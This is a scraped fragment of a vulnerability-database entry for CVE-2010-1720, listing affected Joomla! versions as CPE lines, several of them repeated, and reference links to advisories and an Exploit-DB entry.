Joomla>>Joomla\! >> Version 3.9.17 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.19 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.20 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.21 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.22 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.22 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.23 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.23 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.23 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.24 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.24 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.25 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.26 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.27 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.9.28 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.10.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.10.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.10.2 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.10.3 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.10.4 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.10.5 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.10.6 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.10.7 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.10.8 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.10.9 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.10.10 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.10.11 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.10.12 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.10.13 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.10.14 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.10.15 (Open CPE detail)
Joomla>>Joomla\! >> Version 3.10.16 (Open CPE detail)
Joomla>>Joomla\! >> Version 4.0.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 4.0.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 4.0.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 4.0.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 4.0.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 4.0.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 4.0.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 4.0.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 4.0.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 4.0.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 4.0.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 4.2.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 4.2.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 4.2.2 (Open CPE detail)
Joomla>>Joomla\! >> Version 4.2.3 (Open CPE detail)
Joomla>>Joomla\! >> Version 4.2.4 (Open CPE detail)
Joomla>>Joomla\! >> Version 4.2.5 (Open CPE detail)
Joomla>>Joomla\! >> Version 4.2.6 (Open CPE detail)
Joomla>>Joomla\! >> Version 4.2.7 (Open CPE detail)
Joomla>>Joomla\! >> Version 4.2.8 (Open CPE detail)
Joomla>>Joomla\! >> Version 4.2.9 (Open CPE detail)
Joomla>>Joomla\! >> Version 4.3.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 4.3.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 4.3.2 (Open CPE detail)
Joomla>>Joomla\! >> Version 4.3.3 (Open CPE detail)
Joomla>>Joomla\! >> Version 4.3.4 (Open CPE detail)
Joomla>>Joomla\! >> Version 4.4.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 4.4.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 4.4.2 (Open CPE detail)
Joomla>>Joomla\! >> Version 4.4.3 (Open CPE detail)
Joomla>>Joomla\! >> Version 4.4.4 (Open CPE detail)
Joomla>>Joomla\! >> Version 4.4.5 (Open CPE detail)
Joomla>>Joomla\! >> Version 4.4.6 (Open CPE detail)
Joomla>>Joomla\! >> Version 5.0.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 5.0.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 5.0.2 (Open CPE detail)
Joomla>>Joomla\! >> Version 5.0.3 (Open CPE detail)
Joomla>>Joomla\! >> Version 5.1.0 (Open CPE detail)
Joomla>>Joomla\! >> Version 5.1.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 5.1.2 (Open CPE detail)
Joomla>>Joomla\! >> Version 11.2 (Open CPE detail)
Joomla>>Joomla\! >> Version 11.3 (Open CPE detail)
Joomla>>Joomla\! >> Version 11.4 (Open CPE detail)
Joomla>>Joomla\! >> Version 12.1 (Open CPE detail)
Joomla>>Joomla\! >> Version 12.3 (Open CPE detail)
Joomla>>Joomla\! >> Version 13.1 (Open CPE detail)

References

http://www.securityfocus.com/bid/39466
Tags : vdb-entry, x_refsource_BID

http://www.exploit-db.com/exploits/12200
Tags : exploit, x_refsource_EXPLOIT-DB

https://exchange.xforce.ibmcloud.com/vulnerabilities/57775
Tags : vdb-entry, x_refsource_XF

http://osvdb.org/63894
Tags : vdb-entry, x_refsource_OSVDB

http://www.xenuser.org/documents/security/qpersonel_sql.txt
Tags : x_refsource_MISC

http://secunia.com/advisories/39445
Tags : third-party-advisory, x_refsource_SECUNIA

CVE-2010-1720 : Detail